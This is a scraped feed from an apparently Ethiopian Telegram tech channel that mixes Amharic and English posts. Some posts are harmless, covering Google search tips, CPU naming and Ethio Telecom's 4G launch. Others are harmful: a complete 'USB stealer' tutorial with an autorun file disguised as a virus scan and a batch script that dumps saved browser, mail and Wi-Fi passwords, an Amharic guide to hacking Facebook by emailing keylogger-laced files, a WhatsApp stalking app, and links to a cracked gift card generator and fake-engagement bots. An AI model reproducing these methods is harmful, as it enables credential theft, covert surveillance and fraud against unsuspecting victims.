🇪thio ቴክ
3.64K subscribers
405 photos
74 videos
647 files
589 links
🔍 ስለቴክኖሎጂ አዳዲስ ና ትምህርት አዘል መረጃዎችን የሚያገኙበት ቻናል..
ውድ የኢትዮ ቴክ ቤተሰቦች እና የቻናላችን ተከታታዮች በሙሉ
⚠️ሃሳብ ና አስተያየት => @endu12endu @yoni709 @baydis
Download Telegram
​​See Last Seen Of Ppl Even He Blocked U On WhatsApp

🔴 Steps:-
Step 1 – U Just Need To Install The App Given Below..
https://www.apkmonk.com/app/com.sotla.sotla/
Step 2 – Click On Agree And Continue.. 
Step 3 – Find + At The Top Right Side And Select WhatsApp..
Step 4 – Add The Number Of Person U Want To See.. 
Step 5 – The App Will Notify U Whenever That Person Become Online Or Offline.

@ethiotec
•ይህ መኪና Tesla Model X ይባላል!
በአንድ Full Charge እስከ 500 Km የሚሄድ ሲሆን ዋጋው በGoogle መሰረት ከ132,000 ዶላር እስከ 144,000 Dollar Range ያረጋል ብሏል!
•ኢትዮጵያ ውስጥ Electric መኪና Import ማረግ ከቀረጥ ነፃ ነው!

✅እንደዚህ አይነት ሚገዛውን ሚያውቅ ሀብታም ደስ ይለኛል! 😍
ውድ Ethio ቴክ ቤተሰቦች ዛሬ ብዙ ያልተለመዱ ከጎግል ላይ መረጃ ማፈላለጊያ
ዘዴዎችን አጠር ባለ መልኩ ልንነግራችሁ ወደድን

♻️አንድ ሰው ከኢንተርኔት ላይ መረጃ ለማውጣት
ኮምፒውተሩን ከከፈተ በኋላ አብዛኛውን ጊዜ የሚጎበኘው
ጎግል የተሰኘውን የመረጃ መፈለጊያ ድረ ገጽ ነው።
እዚህ ድረ ገጽ ላይ በሚሊዮኖች የሚቆጠሩ የመረጃ
ሰብስቦች ተቀምጠው ይገኛሉ።
ሆኖም እነኚህን መረጃዎች ፈልገን የምናገኝበት መንገድ
የምናገኘውን መረጃ ውስንነት እና ጥራት ይወስነዋል።
እኛም ከጎግል ላይ መረጃ ስንፈልግ የምንፈልገውን
መረጃ በብዛት እና በጥራት ሊያስገኙልን የሚችሉ
የአፈላለግ መንገዶችን እንጠቁማችሁ።

1⃣. የምንፈልገውን መረጃ በትምህርተ ጥቅስ ውስጥ
በማድረግ መፈለግ ' '
ይሄ በብዛት የሚታወቅ መፈለጊያ ዘዴ ሲሆን፥ እናንተ
የምትፈልጉትን ቃላት ወይንም መረጃ የያዙ ገጾችን ብቻ
መርጦ እንዲያመጣም ያደርጋል፡፡

2⃣. የኮከብ ምልክትን በመጠቀም የማይታወቁ ቃላት
ወይንም ሀረግን መፈለግ
የማይታወቅ ወይም እንግዳ የሆነ ቃል ወይም ሀረግን
የኮከብ ምልክትን ከቃሉ ወይም ሀረጉ አስቀድምን
በመጠቀም መፈለግ የተሻለ ውጤት ለማግኘት
እንደሚረዳ ይነገራል።
ለምሳሌ፡ (e.g. “ is thicker than water”). ወይንም
ደግሞ እንግዳ የሆነው ቃል በዓረፍተ ነገሩ መሀል ላይ
የሚገኝ ከሆነ (e.g. “imagine all the * living for
today”) በማድረግ መፈለግ ይቻላል፡፡

3⃣. የእናንተ ፍላጎት ያልሆኑ ግን ለመፈለግ ከፃፉት ሀረግ
ውስጥ ያሉ ፊደሎችን ውጤት እንዳያመጣ ከሀረጉ መሀል
የመቀነስ ምልክትን መጠቀም
አንድ መጠሪያ የሆነ ነገር ወይም ረዘም ያለ ሀረግ
ለመፈለጊያነት ጎግል ላይ በምትጽፉበት ወቅት አንዱን
ቃል በመምረጥ የእሱን ውጤት ብቻ እንዳያመጣ
በምትፈልጉት ቃላት መሀል የመቀነስ ምልክትን
በመጠቀም ይህን ማስቀረት ትችላላችሁ።
ለምሳሌ፦ (jaguar -car)

4⃣. የሁለት ነገሮችን ልዩነት ወይም አንድነት ለማወቅ
ከፈገለጋችሁ “vs.” በመጠቀም መፈለግ
ለምሳሌ ራትዎን በርገር ወይም ፒዛ ለመብላት ፈልገው
ሁለቱን ማወዳደር ቢፈልጉ ሁለቱን በ “vs.” ጎን ለጎን
አድርጎ በመጻፍ የሁለቱንም መረጃ ጎን ለጎን ሆኖ ማግኘት
ትችላላችሁ።

5⃣. የምስሎችን አድራሻ ለመፈለግ
የሚያውቁት የመሰሎትን ፎቶ አስተውለው ከየት እንደመጣ
እና ሌላ ተመሳሳይ ፎቶ እንዳለው ማወቅ ከፈለጉ ጎግል
ላይ በመሄድ የካሜራ ማንሻ ቁልፍ የምትመስለዋን
በመጫን ፎቶውን ከኮምፒውተርዎ ወደ ጎግል በማስገባት
ተመሳሳዩን ፎቶ እና መረጃ ማግኘት ይችላሉ።

#መረጃዎችን ለወዳጅዎ ያጋሩ።

@Ethiotec
🔰 How To Get Free YouTube Views And Subscribers 🔰

1. After Signing Up addmf.co Login

2. Go to "Add Site/Page'

3. Choose The Type (Subcribers , Views , Likes)

4. Put Ur Page Url (For Views/Likes) / Profile ID (For Subs)

5. And Put Ur CPC to 8-15

6. Enjoy Getting Free Subcribers , Views , Likes!

➖ @ethiotec➖
🔰 Social Media Bot For Social Platforms 🔰

1.Register in this website = soctop.net

2.Claim 25 coins bonus.

3.Confirm email address and get 25 coins bonus more.

4.Download the SocialBot from the website.

5.Add 4 accounts per website Twitter / Youtube , Instagram , Ask.fm , VK.com or OK.ru

6.Run the SocialBot online 24/7 to collect coins.

I get 800 coins for 50 mins online.

🌀How to get likes/views/shares and etc on your official profile:

1.Go in the website.

2.Click on new task.

3.Add profile link for social media websites to get likes/views and etc.

➖ @ethiotec➖
🔍 ዛሬ የኮምፒዩተሮች በተለይም የlaptop ኮምፒዩተሮች CPU ሲያሜ ላይ ነው የምናወራው፡፡   
▬▬▬▬▬▬▬▬▬▬▬▬▬

❖አብዛኞቻችን በኮምፒዩተሮቻችን CPU ላይ ያለን እውቀት ውስን ነው፡፡
ለምሳሌ Core i3, Core i5 እና Core i7 CPU አይነቶች ስናይ እላያቸው ላይ ባለው ቁጥር ብልጫ ብቻ እናወዳድራለን፡፡ ከዛሬ በኃላ ግን በትክክለኛው ስያሜ እንገመግማለን፡፡

❖በኮምፒዩተሮቻችን CPU ላይ የምናየው ስሞች እላያቸው ላይ ፊደላት ይገኛሉ፡፡ እነሱ ለምን ተቀመጡ? እንዲሁ በዘፈቀድ የተቀመጠ ፊደላት ናቸውን?
 እነዚህ ፊደላት ዝም ብለው የተቀመጡ አይደሉም የራሳቸው የሆን ትርጉም አላቸው፡፡

🖱የኮምፒዩተሮቻችን CPU ስም እነዚህም ፊደላት ከያዘ፡

“K” – Unlocked፡- ያልተቆለፈ CPU ይህ ማለት በቀላሉ Overclocked (የCPU አቅም ከነበረበተት መጠን መጨመር ‹በቀጣይ ዘገባዎች ላይ እናየዋለን›) የሚደረግ CPU ናቸው፡፡ እላያቸው ላይ “K” የሚል ፊደል የሌለበት የCPU አይነቶች የOverclock የመደረግ ሁኔታ አምብዛም ነው፡፡

ምሳሌ፡ Intel® Core™ i5-8600K

“H” – High Performance Graphics: - እነዚህ CPU ለኮምፒዩተር ጨዋታዎች(Gaming) እና ፎቶ እና ቪዲዮ ለማቀናበር ይመረጣሉ ማለትም ብዙ ሀይል ተጠቀሚ እና የተሻለ አቅም ያላቸው CPU ናቸው።

“Q” – Quad Core:- አራት Core ወይም አንድን ስራ ለአራት አካላት የሚከፋፈል CPU  ናቸው፡፡

🖱በዚህም መሰረት “HQ” ሚል ፊደላት ካሉ በጣም ውድ እና ምርጥ ከሚባሉት CPU አይነቶች  ወስጥ አንዱ ነው፡፡

ምሳሌ፡ Intel® Core™ i7-7700HQ

”M” – Mobile CPU:- በተንቀሳቃሽ(Portable) ኮምፒዩተሮች ላይ የምናገኘው ሲሆን በቀላሉ ለመቀዝቀዝ ትንሽ ሀይል ይጠቀማል፡፡ በተጨማሪም ብዙ ጊዜ እንዲተኙ(Sleep mode capability) የደረጋል፡፡

“Y” - Extremely low Power

“U” – Ultra low Power

ከለይ ያሉት ሁለቱም የሚያመለክቱት ሀይል ቆጣቢ ወይም ዝቅተኛ አቅም ያላቸው CPU ናቸው፡፡

ምሳሌ፡ Intel® Core™ i5-7200U
Source ethio hackers


@ethiotec
#Password #Cracker
How To Install John Tool for Kali Linux (Password Cracker)

Top Best Kali Linux Hacking Tool
Best PASSWORD CRACKER Tool


Kali Linux 👇

$ apt install -y sudo

$ sudo apt-get install john

$ john


Windows 👇

Download File And Run CMD

Download : 1.9.0-jumbo-1 64-bit Windows binaries in 7z, 22 MB (signature) or zip, 63 MB (signature)

Download : 1.9.0-jumbo-1 32-bit Windows binaries in 7z, 21 MB (signature) or zip, 61 MB (signature)

________________________________

How to use click here this link https://onlinehacking.com
Upload Video website Play Now

https://t.me/joinchat/AAAAAEbYFWXcpsYGdicNUw
Channel photo updated
​​🔰GIFT CARD GENERATOR V1.4.0 CRACKED BY ROMEO🔰

🔴This generator has 10 modules 9 for different websites and 1 for custom if you want to make your own gift card pattern. These modules are Netflix, Spotify, Amazon, Xbox Live, Steam, Itunes and Google Play.

🔷Link :- https://darkarmy.in/index.php?forums/cracking-tools.30/
Top 22 Tools for Ethical hacking at the moment
What are Hacking Tools?
Hacking Tools are computer programs and scripts that help you find and exploit weaknesses in computer systems, web applications, servers and networks. There is a variety of such tools available on the market. Some of them are open source while others are commercial solution.
In this list we highlight the top 20 tools for Ethical Hacking of web applications, servers and networks.
1) Netsparker
2) Acunetix
3) Probely
4) SaferVPN
5) Burp Suite
6) Ettercap
7) Aircrack
8) Angry IP Scanner
9) GFI LanGuard
10) Savvius
11) QualysGuard
12) WebInspect
14) L0phtCrack
15) Rainbow Crack
16) IKECrack
17) IronWASP
18) Medusa
19) NetStumbler
20) SQLMap
21) Cain & Abel
22) Nessus
What is Netsparker?

Netsparker is an automated, yet fully configurable, online web application security scanner that enables you to scan websites, web applications and web services, and identify security flaws. Netsparker can scan all types of web applications, regardless of the platform or the language with which they are built.

Netsparker is the only online web application security scanner that automatically exploits identified vulnerabilities in a read-only and safe way, in order to confirm identified issues. It also presents proof of the vulnerability so you do not need to waste time manually verifying it. For example, in the case of a detected SQL injection vulnerability, it will show the database name as a proof of the vulnerability.

Our scanning technology is designed to help you secure web applications easily without any fuss, so you can focus on fixing the reported vulnerabilities. If Netsparker cannot automatically confirm a vulnerability it will inform you about it by prefixing it with '[Possible]', and assigning an accuracy rating so you know what should be fixed immediately.
​​🔰HOW TO MAKE A USB STEALER🔰

◼️TUTORIAL:

open notepad/wordpad
type:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save this as AUTORUN.inf

open a new notepad/wordpad document
type:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt
save this as LAUNCH.bat

copy the autorun and launch file to your USB

go to http://www.nirsoft.net/ and download the programs named in step 2

extract the files you downloaded to your desktop and copy all the .exe files to your USB
remove and re-insert your USB

click on the option perform a virus scan
(this is an example, if you want it to say something else go to the autorun file and change it ;) )
go to my computer—-> USB DRIVE and open it
you will now see some text files, if you open them you will see usernames and passwords
NOTICE: this only recovers passwords that have once been saved on your computer
ኪሎጊንግ Keylogging
★☆★☆★☆★☆★
ይህ ሌላኛዉ በጣም ጥሩ እና ምቹ የፌስቡክ ሀኪንግ ማድረጊያ ተመራጭ
መንገዶች አንዱ ነዉ ኪሎጊንግ
ከቃሉ እንደምንረዳዉ የዚህ አይነቱ የሀኪንግ መንገድ ዋነኛ አሰራር
ማንኛዉንም መረጃዎች ወደኮንፒዉተራችን የምናስገባበትን ኪቦርድ
ላይ መሰረት የደረገ የሀኪንግ ስልት ነዉ ፡፡ ይህ ዘዴ ፌስቡክን
ሀክ ለማድረግ በሰፊዉ ስራ ላይ ዉሎ እናገኝዋለን አብዘኞች
አካዉንታቸዉን የሚመነተፊበትም ዋነኛ መንገድ ሆኖም ተመዝግቦል፡፡
ስለዚህ አይነቱ ሀኪንግ አሰራር ሰንመለከት ሀከሩ የሚጠበቅበት
በቀላሉ ሊያጠቃዉ ወደሚፈልገዉ ወይም ወደ ተጠቂዉ ኢሜል አድራሻ
በኪሎገር የተበከለዉን ፋይል መላክ ብቻ ነዉ ፡፡ ተጠቂዉ ፋይሉን
እንደደረሰዉ በኮንፒዉተሩ ላይ በሚከፍትበት ጌዜ ኪሎገሩ
በስተጀርባ /በድብቅ/ እራሱን ይጭናል በተመሳሳይ ሞባይል ላይም
እንደዚሁ ይሆናል እያንዳንዱኪዎችጋር ይዋሀዳል ይህ ሁሉ ሲደረግ
ለተጠቂዉ ምንም አይነት መልዕክት ወይም ምልክት ላያሳይ ይችላል
፡፡ እዚህ ጋር ልብ ልንለዉ የሚገባዉ የሚላክላችዉ ፋይል ፎቶ
ወይም የጹሁፍ መልክት ሊሆን ይችላል በዉስጡ ግን ተያይዞ/አታች/
ሆኖ የሚመጣዉ ፋይል ማለትም የተበከለዉ ወይም ኪሎገሩ እንደ
ኪሎገር ሶፍትዌር በግልጽ ልታዩት አትችሉም ማለት ነዉ ፡፡
ከዛች ሰዓት እና ደቂቃ አንስቶ ተጠቂዉ ኦንላይንም(online) ሆነ
ኦፍላይን (offline) ሆኖ በኪቦርዱ ለይ የተጫናቸዉን ኪዎች ወይም
ቁልፎች እያንዳንዱን የሚከዉናቸዉን ነገሮች ሁሉ ሰመሪ ወይም
ማጠቃለያ እየፈጠረ ዉደ ሀከሩ ሰርቨር ወይም ኮንፒዉተር ላይ
አፕሎድ ወይም ኢሜል ያድርግለታል ማለት ነዉ ፡፡ ታዲያ ተጠቂዉ
በተለያዩ አካዉንቶቹ ሲወጣና ሲገባ የተጠቀማቸዉን የተጫናቸዉን
እያንዳንዱን ቁልፎች በመቅዳት በየሳዓቱ ለሀከሩ መረጃን
የሚያቀብል በጣም ወሳኝ የሀኪንግ መንገድ ነዉ ፡፡ ታዲያ የዚህ
አይነቱን ሀኪንግ መንገድ ለመሞከር የሚያስፈልገዉ እዉቀት እጅግ
እንብዛም ከባድ የሚባል አይደለም
🕸🕸🕸ይቀጥላል🕸🕸🕸


@ethiotec
Iɴsɪᴅᴇ_ᴛʜᴇ_Dᴀʀᴋᴡᴇʙ_1sᴛ_ᴇᴅɪᴛɪᴏɴ_ʙʏ.pdf
17.6 MB
🔰 Iɴsɪᴅᴇs ᴛʜᴇ Dᴀʀᴋ Wᴇʙ 1sᴛ ᴇᴅɪᴛɪᴏɴ ( 17.6 MB )🔰
🧾 ᴇʙᴏᴏᴋ Pᴀɢᴇs🧾 :- 286
🔹 Pᴀɪᴅ Eʙᴏᴏᴋ Wᴏʀᴛʜ 48$ 🔹
🔸Dᴏᴡɴʟᴏᴀᴅ Lɪɴᴋ 👆🏻 🔸

@ethiotec
✳️ ኢትዮ ቴሌኮም የLte advance 4G አገልግሎት በአዲስ አበባ በይፋ መጀመሩን አስታውቋል።

የ4G ኔትወርክ አገልግሎት ማብሰሪያ ፕሮግራም በአዲስ አበባ በመካሄድ ላይ ነው።

የኢትዮ ቴሌኮም ዋና ስራ አስፈፃሚ ወ/ት ፍሬህይወት በማስጀመሪያ ፕሮግራሙ ላይ እንዳሉት በጣም ፈጣን የኢንተርኔት አገልግሎት ልታገኙ #ስለሆነ እንኳን ደስ ያላችሁ ብለዋል።

የዚህ ኔትወርክ ማስፋፊያ ግንባታ የቻይናው #ሁዋዌ ኩባንያ የተከናወነ ሲሆን ይህ ግንባታ 170 ሚሊዮን ብር እንደፈጀ ተገልጿል።

ወ/ት ፍሬህይወት እንደገለጹት የደንበኞች እየጨመረ ያለ ፍላጎት ለዚህ እንዳበቃቸው ገልጸው በቀጣይ ከፍተኛ የኢንተርኔት ፍላጎት ያላቸውን የኢትዮጵያ ከተሞች በጥናት እየለየን # Lte Advance 4G ተግባራዊ እናደርጋለን ብለዋል።

ይሄ የኔትወርክ ማስፋፊያ ያለምንም ዕዳ በመንግስት ወጪ የተገነባ ሲሆን አገልግሎቱ ከዛሬ በመላ አዲስ አበባ አገልግሎት ይጀምራል።

ይህ የ4G Lte አገልግሎት #በ 50 የተመረጡ የመዲናዋ ቦታዎች ላይ የሙከራ አገልግሎት ሲሰጥ የቆየ ሲሆን ከዚህ በኋላ አገልግሎት የሚሰጠውም የኢንተርኔት ፍላጎት ከፍተኛ በሆኑባቸው አካባቢዎች ብቻ ነው ተብሏል።

#አዲሱ አገልግሎት በአንዳንድ አፕሊኬሽኖች ላይ፣ advanced Lte ከ4G አራት ዕጥፍ ከ #3G ደግሞ 14 ዕጥፍ እንደሚፈጥን ወይዘሪት ፍሬህይወት ተናግረዋል።

© ETHIO FM

#መረጃዎችን ለወዳጅዎ ያጋሩ።
Source ethiohacker


@ethiotec